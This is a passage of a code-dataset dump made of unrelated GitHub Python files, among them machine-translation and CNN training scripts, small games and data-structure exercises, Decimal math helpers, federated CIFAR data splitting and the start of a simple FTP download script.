sorted(valid_dirs.items()):\n\n data_dir = os.path.join(root_dir, dir_)\n\n print(\"[INFO] Loading validation data %i from %s\" % (idx_, dir_))\n\n if opt.data_format in ['bin', 'raw']:\n raise NotImplementedError\n\n elif opt.data_format in ['scp', 'scpmem', 'mmem']:\n\n if opt.data_format in ['scp', 'scpmem']:\n audio_data = torch.load(os.path.join(data_dir, \"data.scp_path.pt\"))\n src_data = SCPIndexDataset(audio_data, concat=opt.concat)\n else:\n src_data = MMapIndexedDataset(os.path.join(data_dir, \"data.src\"))\n\n tgt_data = MMapIndexedDataset(os.path.join(data_dir, \"data.tgt\"))\n\n src_lang_data = MMapIndexedDataset(os.path.join(data_dir, 'data.src_lang'))\n tgt_lang_data = MMapIndexedDataset(os.path.join(data_dir, 'data.tgt_lang'))\n\n if os.path.exists(os.path.join(data_dir, 'data.src_sizes.npy')):\n src_sizes = np.load(os.path.join(data_dir, 'data.src_sizes.npy'))\n tgt_sizes = np.load(os.path.join(data_dir, 'data.tgt_sizes.npy'))\n else:\n src_sizes, tgt_sizes = None, None\n\n if opt.encoder_type == 'audio':\n data_type = 'audio'\n else:\n data_type = 'text'\n\n if not opt.streaming:\n valid_data = onmt.Dataset(src_data, tgt_data,\n src_sizes, tgt_sizes,\n src_lang_data, tgt_lang_data,\n batch_size_words=opt.batch_size_words,\n data_type=data_type, sorting=True,\n batch_size_sents=opt.batch_size_sents,\n src_align_right=opt.src_align_right,\n cleaning=True, verbose=True, debug=True,\n num_split=len(opt.gpus),\n token_level_lang=opt.language_classifier_tok,\n bidirectional=opt.bidirectional_translation,\n multidataset=True,\n en_id=opt.en_id)\n\n valid_sets.append(valid_data)\n\n else:\n raise NotImplementedError\n\n train_data = train_sets\n valid_data = valid_sets\n\n if opt.load_from:\n checkpoint = torch.load(opt.load_from, 
map_location=lambda storage, loc: storage)\n print(\"* Loading dictionaries from the checkpoint\")\n dicts = checkpoint['dicts']\n print(\"(train.py) dict.keys() of checkpoint/saved model: \", dicts.keys())\n\n if opt.load_vocab_from_data is not None: # only useful when vocab is expanded\n vocab_data = torch.load(opt.load_vocab_from_data, map_location=lambda storage, loc: storage)\n print(vocab_data.keys())\n # TODO: OVERWRITE src and tgt?\n dicts['src'] = vocab_data['src']\n dicts['tgt'] = vocab_data['tgt']\n # for tok in vocab_data['dicts']['src'].labelToIdx: # toks in new language\n # dicts['src'].add(tok)\n # for tok in vocab_data['dicts']['tgt'].labelToIdx: # toks new language\n # dicts['tgt'].add(tok)\n\n # TODO: doesn't really hurt supervised directions when re-initializing this?\n # if len(vocab_data['dicts']['langs']) > dicts['langs']:\n for lan in vocab_data['langs']: # new language\n if lan not in dicts['langs']:\n dicts['langs'][lan] = len(dicts['langs'])\n print(' *** added language dict {0} to {1}'.format(lan, dicts['langs']))\n # else::q\n # dicts['langs'] = vocab_data['dicts']['langs']\n\n # print(dicts['langs']['cs'])\n # print(vocab_data['gen'])\n # if 'gen' not in dicts:\n # dicts['gen'] = list()\n # for lan in vocab_data['gen']:\n # print(lan)\n # if lan not in dicts['gen']:\n # dicts['gen'][lan] = len(dicts['gen'])\n # print(' *** added gender dict {0} to {1}'.format(gen, dicts['gen']))\n\n else:\n dicts['tgt'].patch(opt.patch_vocab_multiplier)\n checkpoint = None\n\n if \"src\" in dicts:\n print(' * vocabulary size. source = %d; target = %d' %\n (dicts['src'].size(), dicts['tgt'].size()))\n else:\n print(' * vocabulary size. target = %d' %\n (dicts['tgt'].size()))\n\n print('* Building model...')\n\n if not opt.fusion:\n model = build_model(opt, dicts)\n\n \"\"\" Building the loss function \"\"\"\n\n if opt.ctc_loss > 0.0:\n from onmt.speech.ctc_loss import CTC\n loss_function = CTC(dicts['tgt'].size(), opt.model_size, 0.0, reduce=True)\n # if opt.ctc_loss != 0:\n # loss_function = NMTAndCTCLossFunc(dicts['tgt'].size(),\n # label_smoothing=opt.label_smoothing,\n # ctc_weight=opt.ctc_loss)\n else:\n loss_function = NMTLossFunc(opt.model_size, dicts['tgt'].size(),\n label_smoothing=opt.label_smoothing,\n mirror=opt.mirror_loss)\n\n # This function replaces modules with the more optimized counterparts so that it can run faster\n # Currently exp with LayerNorm\n optimize_model(model)\n\n else:\n from onmt.model_factory import build_fusion\n from onmt.modules.loss import FusionLoss\n\n model = build_fusion(opt, dicts)\n\n loss_function = FusionLoss(dicts['tgt'].size(), label_smoothing=opt.label_smoothing)\n\n if opt.sim_loss_type:\n sim_loss_input_type = opt.sim_loss_type % 10\n sim_loss_func_type = opt.sim_loss_type // 10\n aux_loss_weight = opt.aux_loss_weight\n\n if sim_loss_func_type == 1:\n aux_loss_function = MSEEncoderLoss(input_type=sim_loss_input_type, weight=aux_loss_weight)\n elif sim_loss_func_type == 2:\n aux_loss_function = CosineEncoderLoss(input_type=sim_loss_input_type, weight=aux_loss_weight)\n else:\n raise NotImplementedError\n\n else:\n aux_loss_function = None\n\n n_params = sum([p.nelement() for p in model.parameters()])\n print('* number of parameters: %d' % n_params)\n\n if len(opt.gpus) > 1 or opt.virtual_gpu > 1:\n raise NotImplementedError(\"Multi-GPU training is not supported at the moment.\")\n else:\n if not opt.adversarial_classifier:\n trainer = XETrainer(model, loss_function, train_data, valid_data, dicts, opt, True, aux_loss_function)\n 
else:\n trainer = XEAdversarialTrainer(model, loss_function, train_data, valid_data, dicts, opt)\n\n trainer.run(checkpoint=checkpoint)\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"lenacabrera/gb_mnmt","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":27579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"7891790776","text":"import random\n\n\ndef get_currency_rate():\n return 3.5\n\n\ndef get_money_interval(difficulty, random_number):\n current_rate = get_currency_rate()\n lower_bound = random_number - (5 - difficulty)\n upper_bound = random_number + (5 - difficulty)\n return lower_bound * current_rate, upper_bound * current_rate\n\n\ndef get_guess_from_user():\n return float(input(\"Enter your guess for the value in ILS: \"))\n\n\ndef compare(lower_bound, upper_bound, user_guess):\n if lower_bound <= user_guess <= upper_bound:\n return True\n else:\n return False\n\n\ndef play(Difficulty):\n random_number = random.randint(1, 100)\n num_of_guesses = 0\n while num_of_guesses < 3:\n\n lower_bound, upper_bound = get_money_interval(\n Difficulty, random_number)\n print(f\"Guess the value of {random_number} USD in ILS.\")\n user_guess = get_guess_from_user()\n result = compare(lower_bound, upper_bound, user_guess)\n if result:\n return result\n print('no...\\n')\n num_of_guesses += 1\n\n return result\n","repo_name":"vitalydono/world-of-games","sub_path":"CurrencyRouletteGame.py","file_name":"CurrencyRouletteGame.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"29191955988","text":"class Node:\n def __init__(self, data, priority):\n self.data = data\n self.priority = priority\n self.next = None\n\n\nclass Queue:\n def __init__(self):\n self.front = None\n\n def enqueue(self, value, priority):\n new_node = Node(value, priority)\n if self.front is None:\n self.front = new_node\n return\n if self.front.priority < priority:\n new_node.next = self.front\n self.front = new_node\n return\n temp = self.front\n while temp.next is not None and temp.next.priority > priority:\n temp = temp.next\n if temp.next is None:\n temp.next = new_node\n else:\n new_node.next = temp.next\n temp.next = new_node\n\n def dequeue(self):\n # remove and return the highest-priority value from the front\n if self.front is None:\n return None\n node = self.front\n self.front = node.next\n return node.data\n\n\n\n\nq = Queue()\nq.enqueue(1, 1)\nq.enqueue(2, 3)\nq.enqueue(3, 2)\nprint(q.dequeue())\nprint(q.dequeue())\nprint(q.dequeue())\n","repo_name":"cspandit/Python-DS-and-Algo","sub_path":"queue/implementation/queue_using_circular_linked_list.py","file_name":"queue_using_circular_linked_list.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"74485296087","text":"import time\nimport math\nimport os\nimport numpy as np\nimport h5py\nfrom PIL import Image\n\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\n\nfrom privacy.Model_Inversion_Attack.net_norm import *\nfrom privacy.Model_Inversion_Attack.utils_norm import *\n# from preprocess_test import *\n\ndef train(DATASET = 'CIFAR10', network = 'MIASCNN', NEpochs = 200, imageWidth = 32,\n imageHeight = 32, imageSize = 32*32, NChannels = 3, NClasses = 10,\n BatchSize = 32, learningRate = 1e-3, NDecreaseLR = 20, eps = 1e-3,\n AMSGrad = True, model_dir = \"checkpoints/CIFAR10/\", model_name = \"ckpt.pth\", gpu = True):\n\n print(\"DATASET: \", 
DATASET)\n\n\n###load data\n\n if DATASET == 'Medical': \n \n h5f = h5py.File('/home/cougarnet.uh.edu/pyuan2/Projects/Incidental_Lung/privacy/Model_Inversion_Attack/lung_train76.h5', 'r')\n X_train = h5f['x'][:]\n Y_train = h5f['y'][:]\n h5f.close()\n\n h5f = h5py.File('/home/cougarnet.uh.edu/pyuan2/Projects/Incidental_Lung/privacy/Model_Inversion_Attack/lung_test26.h5', 'r')\n X_test = h5f['x'][:]\n Y_test = h5f['y'][:]\n h5f.close()\n \n\n print(Y_train)\n print(Y_test)\n X_train = preprocess(X_train)\n X_test = preprocess(X_test)\n\n###load network\n\n netDict = {\n 'CIFAR10CNN': CIFAR10CNN,\n }\n\n if network in netDict: \n net = netDict[network](NChannels)\n else:\n print(\"Network not found\")\n exit(1)\n\n print(net)\n print(\"len(trainset) \", len(X_train))\n print(\"len(testset) \", len(X_test))\n\n### parameters\n criterion = nn.CrossEntropyLoss()\n softmax = nn.Softmax(dim=1)\n\n if gpu: # GPU\n net.cuda()\n criterion.cuda()\n softmax.cuda()\n\n optimizer = optim.Adam(params = net.parameters(), lr = learningRate, eps = eps, amsgrad = AMSGrad) # Adam optimizer\n # optimizer = torch.optim.SGD(net.parameters(), lr=learningRate) # SGD optimizer\n NBatch = int(len(X_train) / BatchSize)\n cudnn.benchmark = True\n\n###training\n \n for epoch in range(NEpochs):\n lossTrain = 0.0\n accTrain = 0.0\n \n # if epoch >100:\n # optimizer = optim.Adam(params = net.parameters(), lr = learningRate/2, eps = eps, amsgrad = AMSGrad)\n \n for i in range(NBatch):\n \n ### batch data (shuffle)\n index = np.random.randint(0, len(X_train), BatchSize)\n batchX = X_train[index]\n batchX = torch.from_numpy(batchX)\n batchX = batchX.view(-1,1,64,64).type(torch.FloatTensor) \n \n batchY = Y_train[index]\n \n batchY = torch.Tensor([batchY]).long().view(BatchSize)\n \n \n if gpu:\n batchX = batchX.cuda()\n batchY = batchY.cuda()\n \n ### calculate the loss and gradients \n optimizer.zero_grad()\n logits = net.forward(batchX)\n prob = softmax(logits)\n\n # print prob\n loss = criterion(logits, batchY) # + l2loss(logits) # softmax \n # loss = F.nll_loss(F.log_softmax(logits, dim=1), batchY) #+ 0.001 * l2loss(logits) # logsoftmax\n loss.backward()\n\n ### add noise \n # clip_grad(net.parameters(), grad_norm_bound=5)\n # add_noise(net.parameters(), grad_norm_bound=5, scale=10)\n \n optimizer.step()\n \n lossTrain += loss.cpu().detach().numpy() / NBatch\n\n if gpu:\n pred = np.argmax(prob.cpu().detach().numpy(), axis = 1)\n groundTruth = batchY.cpu().detach().numpy()\n\n else:\n pred = np.argmax(prob.detach().numpy(), axis = 1)\n groundTruth = batchY.detach().numpy()\n \n \n \n acc = np.mean(pred == groundTruth) # accuracy per Batch\n accTrain += acc / NBatch # accuracy per iteration\n \n \n\n\n if (epoch + 1) % NDecreaseLR == 0:\n learningRate = learningRate / 2.0\n setLearningRate(optimizer, learningRate)\n\n print(\"Epoch: \", epoch, \"Loss: \", lossTrain, \"Train accuracy: \", accTrain)\n\n### Testing\n\n accTest = evalTest(X_test, Y_test, net, gpu = gpu)\n \n### save trained network\n\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n torch.save(net, model_dir + model_name)\n print(\"Model saved\")\n\n### load trained network\n\n newNet = torch.load(model_dir + model_name)\n newNet.eval()\n accTest = evalTest(X_test, Y_test, newNet, gpu = gpu)\n print(\"Model restore done\")\n\n\nif __name__ == '__main__':\n import argparse\n import sys\n import traceback\n\n try:\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', type = str, default = 'Medical')\n parser.add_argument('--network', 
type = str, default = 'CIFAR10CNN')\n parser.add_argument('--epochs', type = int, default = 50)\n parser.add_argument('--eps', type = float, default = 1e-8) #-3\n parser.add_argument('--AMSGrad', type = bool, default = True)\n parser.add_argument('--batch_size', type = int, default = 1)\n parser.add_argument('--learning_rate', type = float, default = 1e-3)\n parser.add_argument('--decrease_LR', type = int, default = 20) #20\n\n parser.add_argument('--nogpu', dest='gpu', action='store_false')\n parser.set_defaults(gpu=True)\n args = parser.parse_args()\n\n model_dir = \"models/\" + args.dataset + '/'\n model_name = \"CNN_original.pth\"\n\n if args.dataset == 'Medical':\n\n imageWidth = 64\n imageHeight = 64\n imageSize = imageWidth * imageHeight\n NChannels = 1\n NClasses = 2\n network = 'CIFAR10CNN'\n\n\n else:\n print(\"No Dataset Found\")\n exit(0)\n\n \n train(DATASET = args.dataset, network = network, NEpochs = args.epochs, imageWidth = imageWidth,\n imageHeight = imageHeight, imageSize = imageSize, NChannels = NChannels, NClasses = NClasses,\n BatchSize = args.batch_size, learningRate = args.learning_rate, NDecreaseLR = args.decrease_LR, eps = args.eps,\n AMSGrad = args.AMSGrad, model_dir = model_dir, model_name = model_name, gpu = args.gpu)\n\n except:\n traceback.print_exc(file=sys.stdout)\n sys.exit(1)\n","repo_name":"ypy516478793/Incidental_lung","sub_path":"privacy/Model_Inversion_Attack/training_norm.py","file_name":"training_norm.py","file_ext":"py","file_size_in_byte":6723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"12057387584","text":"#coding=utf-8\n'''\nimport subprocess\nimport datetime\nprint(datetime.datetime.now())\np = subprocess.Popen(\"ping localhost > nul\",shell=True)\nprint(\"Program running...\")\np.wait()\nprint(datetime.datetime.now())\n'''\n'''\nfrom tkinter import *\nwin=Tk();\nwin.geometry(\"800x600\")\nwin.minsize(400,300)\nwin.maxsize(1440,900)\nwin.mainloop()\n'''\n'''\nimport subprocess\ntrtcode = subprocess.call([\"notepad.exe\",\"test.txt\"])\nprint(trtcode)\n'''\n'''\nimport requests\nres = requests.get('https://www.baidu.com')\nres.encoding = 'utf-8'\nf=open('send.html','w')\nf.write(res.text)\nf.close()\n#print(res.text)\n'''\n'''\nimport win32process\nhandle = win32process.CreateProcess('C:\\Windows\\\\notepad.exe','',None,None,0,win32process.CREATE_NO_WINDOW,None,None,win32process.STARTUPINFO())\n'''\n\n'''\n# process pool\nfrom multiprocessing import Pool\nfrom time import sleep\nimport subprocess\n\ndef f(x):\n retcode = subprocess.call(\"notepad.exe\")\n sleep(1)\ndef main():\n pool = Pool(processes=10)\n for i in range(1,10):\n result = pool.apply_async(f,(i,))\n pool.close()\n pool.join()\n if result.successful():\n print('successful!')\nif __name__ == \"__main__\":\n main();\n'''\n'''\nimport threading\n\ndef f(i):\n print(\"I am from a thread, num = %d \\n\"%(i))\n\ndef main():\n for i in range(1,10240):\n t = threading.Thread(target=f,args=(i,))\n t.setDaemon(True)\n t.start()\n #t.join()\n \nif __name__ == \"__main__\":\n main()\n'''\n'''\nimport threading\nimport time\nnum = 0\nlock = threading.Lock()\ndef f():\n global num\n if lock.acquire():\n print(\"%s acquired the lock\\n\" %threading.currentThread().getName())\n b = num\n time.sleep(0.001)\n num=b+1\n lock.release()\n print(\"%s released the lock\\n\" %threading.currentThread().getName())\n print(\"%s \\n\" %threading.currentThread().getName())\n\ndef main():\n for i in range(1,20):\n t = threading.Thread(target=f)\n t.setDaemon(True)\n t.start()\n 
t.join()\n print(num)\n\nif __name__ == \"__main__\":\n main()\n'''\nif __name__ == \"__main__\":\n import socket\n sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n \n sock.bind(('localhost',8001))\n sock.listen(5)\n while True:\n connection,address = sock.accept()\n try:\n connection.settimeout(5)\n buf = connection.recv(1024).decode('utf-8')\n if buf == '1':\n connection.send(b'welcome to server!')\n else:\n connection.send(b'please go out!')\n except socket.timeout:\n print('time out!')\n connection.close()","repo_name":"ZZbitmap/Python","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"10742225156","text":"import a2\nimport unittest\n\nclass TestRatEatSprout(unittest.TestCase):\n \"\"\" Test class for Rat.eat_sprout method of a2 module. \"\"\"\n\n def test_rat_eat_sprout_1(self):\n \"\"\"\n Test if rat.num_sprouts_eaten increases.\n \"\"\"\n rat_name = a2.RAT_1_CHAR\n rat_row = 1\n rat_col = 4\n rat = a2.Rat(rat_name, rat_row, rat_col)\n rat.eat_sprout()\n\n self.assertEqual(rat.num_sprouts_eaten, 1)\n\n\n def test_rat_eat_sprout_2(self):\n \"\"\"\n Test if rat.num_sprouts_eaten maps to the correct value.\n \"\"\"\n rat_name = a2.RAT_1_CHAR\n rat_row = 1\n rat_col = 4\n rat = a2.Rat(rat_name, rat_row, rat_col)\n\n for i in range(10):\n rat.eat_sprout()\n\n self.assertEqual(rat.num_sprouts_eaten, 10)\n\n\nif __name__ == \"__main__\":\n unittest.main(exit=False)\n","repo_name":"gacrta/Learn_to_Program","sub_path":"RatMaze/test_rat_eat_sprout.py","file_name":"test_rat_eat_sprout.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"72777154009","text":"#Write a program that reads the code of the ordered items and the desired quantities. Compute and show the amount to be paid per item (price * quantity) and the overall \n# total of the order. Consider that the customer must indicate when the order should be closed.\n\nlanche = ['Cachorro Quente', 'Bauru Simples', 'Bauru com ovo', 'Hambúguer', 'Cheeseburguer', 'Refrigerante']\npreco = [1.20, 1.30, 1.50, 1.20, 1.30, 1.00]\ncod = [100, 101, 102, 103, 104, 105]\npedido = []\ncont = 0\nresp = True\n\nwhile resp != 'NAO' and resp != 'nao' and resp != 'n':\n print('Especificação | Código | Preço')\n print('Cachorro Quente | 100 | R$ 1,20 \\nBauru Simples | 101 | R$ 1,30 \\nBauru com ovo | 102 | R$ 1,50 \\nHambúrguer | 103 | R$ 1,20 \\nCheeseburguer | 104 | R$ 1,30 \\nRefrigerante | 105 | R$ 1,00')\n\n codigo = int(input(\"Digite o código do pedido que você deseja: \"))\n\n z = cod.index(codigo)\n\n qtde = int(input(\"Digite a quantos desse lanche você quer: \"))\n\n valor = preco[z]*qtde\n\n pedido.append(valor)\n\n resp = input(\"Deseja fazer um novo pedido?: \")\n\nwhile cont
Result type matches input type.\r\n\r\n >>> print(exp(Decimal(1)))\r\n 2.718281828459045235360287471\r\n >>> print(exp(Decimal(2)))\r\n 7.389056098930650227230427461\r\n >>> print(exp(2.0))\r\n 7.38905609893\r\n >>> print(exp(2+0j))\r\n (7.38905609893+0j)\r\n\r\n \"\"\"\r\n decimal.getcontext().prec += 2\r\n i, lasts, s, fact, num = 0, 0, 1, 1, 1\r\n while s != lasts:\r\n lasts = s\r\n i += 1\r\n fact *= i\r\n num *= x\r\n s += num / fact\r\n decimal.getcontext().prec -= 2\r\n return +s # unary plus applies the new precision\r\n\r\ndef cos(x):\r\n \"\"\"Return the cosine of x as measured in radians.\r\n\r\n The Taylor series approximation works best for a small value of x.\r\n For larger values, first compute x = x % (2 * pi).\r\n\r\n >>> print(cos(Decimal('0.5')))\r\n 0.8775825618903727161162815826\r\n >>> print(cos(0.5))\r\n 0.87758256189\r\n >>> print(cos(0.5+0j))\r\n (0.87758256189+0j)\r\n\r\n \"\"\"\r\n decimal.getcontext().prec += 2\r\n i, lasts, s, fact, num, sign = 0, 0, 1, 1, 1, 1\r\n while s != lasts:\r\n lasts = s\r\n i += 2\r\n fact *= i * (i - 1)\r\n num *= x * x\r\n sign *= -1\r\n s += num / fact * sign\r\n decimal.getcontext().prec -= 2\r\n return +s # unary plus applies the new precision\r\n\r\ndef sin(x):\r\n \"\"\"Return the sine of x as measured in radians.\r\n\r\n The Taylor series approximation works best for a small value of x.\r\n For larger values, first compute x = x % (2 * pi).\r\n\r\n >>> print(sin(Decimal('0.5')))\r\n 0.4794255386042030002732879352\r\n >>> print(sin(0.5))\r\n 0.479425538604\r\n >>> print(sin(0.5+0j))\r\n (0.479425538604+0j)\r\n\r\n \"\"\"\r\n decimal.getcontext().prec += 2\r\n i, lasts, s, fact, num, sign = 1, 0, x, 1, x, 1\r\n while s != lasts:\r\n lasts = s\r\n i += 2\r\n fact *= i * (i - 1)\r\n num *= x * x\r\n sign *= -1\r\n s += num / fact * sign\r\n decimal.getcontext().prec -= 2\r\n return +s # unary plus applies the new precision\r\n\r\ndef atan2(x):\r\n pass\r\n\r\ndef acos(x):\r\n return 2.*atan2((decimal.Decimal(1. - x)).sqrt(), (decimal.Decimal(1. 
+ x)).sqrt())\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n Pi = pi()\r\n print(sin(Pi / 2))\r\n print(sin(Pi / 6))\r\n print(math.asin(decimal.Decimal(1)) * 2)\r\n print(cos(Pi / 6))\r\n print(decimal.Decimal(3).sqrt() / 2)\r\n\r\n import fractions\r\n ratpi = fractions.Fraction(Pi).limit_denominator(1000)\r\n print(ratpi)\r\n Ratnum = decimal.Decimal(ratpi.numerator)\r\n Ratden = decimal.Decimal(ratpi.denominator)\r\n Ratpi = Ratnum / Ratden\r\n print(Ratpi)\r\n print(Pi)\r\n","repo_name":"brassogre/ProjectLine","sub_path":"Geo/ArbitraryPrecisionFuncs.py","file_name":"ArbitraryPrecisionFuncs.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12108812400","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nimport os\n\nimport envoy\nimport git\nfrom nose.tools import assert_raises\n\nimport batch\nimport identifier\n\nTMP_DIR = '/tmp/tests-ddr-batch'\n\n\n# Exporter\n# TODO test_make_tmpdir\n# TODO test_export\n\n# Checker\n# TODO check_repository\n# TODO check_csv\n# TODO check_eids\n\ndef test_guess_model():\n # no rows\n rowds0 = []\n expected0 = []\n #out0 = batch.Checker._guess_model(rowds0)\n #assert out0 == expected0\n assert_raises(Exception, batch.Checker._guess_model, rowds0)\n # no identifiers\n rowds1 = [\n {'id':'ddr-testing-123-1'},\n {'id':'ddr-testing-123-1'},\n ]\n expected1 = []\n assert_raises(Exception, batch.Checker._guess_model, rowds1)\n # too many models\n rowds2 = [\n {\n 'id':'ddr-testing-123-1',\n 'identifier': identifier.Identifier('ddr-testing-123-1'),\n },\n {\n 'id':'ddr-testing-123-2-master',\n 'identifier': identifier.Identifier('ddr-testing-123-2-master'),\n },\n ]\n assert_raises(Exception, batch.Checker._guess_model, rowds2)\n # entities\n rowds3 = [\n {\n 'id':'ddr-testing-123-1',\n 'identifier': identifier.Identifier('ddr-testing-123-1'),\n },\n ]\n expected3 = 'entity'\n out3 = batch.Checker._guess_model(rowds3)\n assert out3 == expected3\n # files\n rowds4 = [\n {\n 'id':'ddr-testing-123-2-master-a1b2c3',\n 'identifier': identifier.Identifier('ddr-testing-123-2-master-a1b2c3'),\n },\n ]\n expected4 = 'file'\n out4 = batch.Checker._guess_model(rowds4)\n assert out4 == expected4\n # file-roles are files\n rowds5 = [\n {\n 'id':'ddr-testing-123-2-master',\n 'identifier': identifier.Identifier('ddr-testing-123-2-master'),\n },\n ]\n expected5 = 'file'\n out5 = batch.Checker._guess_model(rowds5)\n assert out5 == expected5\n\n# TODO _ids_in_local_repo\n# TODO _load_vocab_files\n# TODO _vocab_urls\n# TODO _http_get_vocabs\n# TODO _validate_csv_file\n\ndef test_prep_valid_values():\n json_texts = [\n '{\"terms\": [{\"id\": \"advertisement\"}, {\"id\": \"album\"}, {\"id\": \"architecture\"}], \"id\": \"genre\"}',\n '{\"terms\": [{\"id\": \"eng\"}, {\"id\": \"jpn\"}, {\"id\": \"chi\"}], \"id\": \"language\"}',\n ]\n expected = {u'genre': [u'advertisement', u'album', u'architecture'], u'language': [u'eng', u'jpn', u'chi']}\n assert batch.Checker._prep_valid_values(json_texts) == expected\n\n# Importer\n# TODO _fidentifier_parent\n# TODO _file_is_new\n# TODO _write_entity_changelog\n# TODO _write_file_changelogs\n# TODO import_entities\n# TODO import_files\n# TODO register_entity_ids\n","repo_name":"gjost/ddr-cmdln-bkup","sub_path":"ddr/DDR/tests_batch.py","file_name":"tests_batch.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 
+{"seq_id":"6012212539","text":"import torch.utils.data\nimport csv\nfrom os import path\nimport os\nimport urllib.request \nimport zipfile\nimport random\nfrom options import ARGS\nimport pickle as pickle\nfrom models import get_net_and_optimizer\nimport copy\n\ndef cifar_parser(line, is_train=True):\n if is_train:\n user_id, image_id, class_id = line\n return user_id, image_id, class_id\n else:\n image_id, class_id = line\n return image_id, class_id\n\n\ndef dirichlet_distribution(): # generate trainset split from csv\n #download csv files\n url=\"http://storage.googleapis.com/gresearch/federated-vision-datasets/cifar10_v1.1.zip\"\n if(ARGS.COLAB):\n dir=\"/content/cifar10_csv\"\n else:\n dir=os.getcwd()+\"/cifar10_csv\"\n try:\n os.mkdir(dir)\n except:\n print(\"Folder already exist\")\n \n urllib.request.urlretrieve(url, dir+\"/cifar.zip\")\n with zipfile.ZipFile(dir+\"/cifar.zip\",\"r\") as zip_ref:\n zip_ref.extractall(dir)\n \n alpha=str(\"{:.2f}\".format(ARGS.ALPHA))\n train_file=dir+\"/federated_train_alpha_\"+alpha+\".csv\"\n \"\"\"Inspects the federated train split.\"\"\"\n print('Train file: %s' % train_file)\n if not path.exists(train_file):\n print('Error: file does not exist.')\n return\n user_images={}\n for client_id in range(ARGS.NUM_CLIENTS):\n user_images[str(client_id)]=[]\n \n with open(train_file) as f:\n reader = csv.reader(f)\n next(reader) # skip header.\n for line in reader:\n user_id, image_id, class_id = cifar_parser(line, is_train=True)\n user_images[user_id].append(int(image_id))\n return user_images\n\n\ndef cifar_iid(train_set): # all clients have all classes with the same data distribution\n user_images={}\n for client_id in range(ARGS.NUM_CLIENTS):\n user_images[str(client_id)]=[]\n \n classes_dict={}\n for label in range(ARGS.NUM_CLASSES):\n classes_dict[label]=[]\n for i in range(len(train_set)):\n label=train_set[i][1]\n classes_dict[label].append(i)\n \n classes_index=[]\n for label in classes_dict.keys():\n for i in range(random.randint(2,7)):\n random.shuffle(classes_dict[label])\n classes_index=classes_index+classes_dict[label]\n\n client_id=0\n \n\n for i in classes_index:\n user_images[str(client_id)].append(i)\n client_id=client_id+1\n if(client_id==ARGS.NUM_CLIENTS):\n client_id=0\n return user_images\n\n\ndef cifar_noniid(train_set): # all clients have a number of class beetwen 1 and 7 with the same data distribution\n user_images=cifar_iid(train_set)\n for key in user_images.keys():\n n_classes=random.randint(ARGS.NUM_CLASS_RANGE[0],ARGS.NUM_CLASS_RANGE[1])\n list_of_class=random.sample(range(0, ARGS.NUM_CLASSES), n_classes)\n new_index_list=[]\n for i in user_images[key]:\n label=int(train_set[i][1])\n if(label in list_of_class):\n new_index_list.append(i)\n user_images[key]=new_index_list\n return user_images\n\n\n\ndef cifar_multimodal_noniid(train_set): \n animals_labels=[2,3,4,5,6,7]\n vehicles_labels=[0,1,8,9]\n \n num_clients_animal=max(int(ARGS.NUM_CLIENTS*ARGS.RATIO),1)\n \n user_images={}\n user_classes={}\n for client_id in range(ARGS.NUM_CLIENTS):\n user_images[str(client_id)]=[]\n if(client_id32->10 \r\n print('-----Train-----')\r\n model.train()\r\n for epoch in range(10):\r\n total_loss = 0.0\r\n for pre, post in tqdm(trainloader):\r\n\r\n post_pred = model(pre)\r\n loss = loss_fn(post_pred, post)\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n total_loss += loss\r\n avg_loss = total_loss/(2*TRAIN_SIZE/BATCH_SIZE)\r\n print(avg_loss.item())\r\n print(pre[np.random.randint(0,32)])\r\n 
print(post_pred[np.random.randint(0,32)])\r\n print(post[np.random.randint(0,32)])\r\n torch.save(model.state_dict(),name_model)\r\n\r\n print('-----Test-----')\r\n model.eval()\r\n total_loss = 0.0\r\n with torch.no_grad():\r\n for pre, post in tqdm(testloader):\r\n post_pred = model(pre)\r\n loss = loss_fn(post_pred, post)\r\n total_loss += loss\r\n avg_loss = total_loss/(2*TEST_SIZE/BATCH_SIZE)\r\n print(avg_loss.item()) \r\n","repo_name":"G1NO3/Geert_code","sub_path":"DL/Neurodynamics/VAE/Ponicare_mapping.py","file_name":"Ponicare_mapping.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27473320289","text":"#title :qdFTP.py\r\n#description :Quick and dirty FTP script.\r\n#author :Harsimran Grewal (Retr0-Flow on github)\r\n#date :08/11/2018\r\n#version :3.0\r\n#usage :python qdFTP.py\r\n#notes : This is meant to be used as a quick way to connect a TRUSTED FTP site over a TRUSTED network. I am not responsible for any data leakage.\r\n# This program is meant to be used through the command line only, any use in functional programs may result in unexpected behaviour/errors\r\n#python_version :3.7.0\r\n#==============================================================================\r\n\r\n\r\nimport os #library containing operating system calls\r\nfrom ftplib import FTP #library for ftp calls\r\n\r\ndef ftpDownload():\r\n # FTP login\r\n ftp = FTP('ADDRESS')\r\n ftp.login('LOGIN', 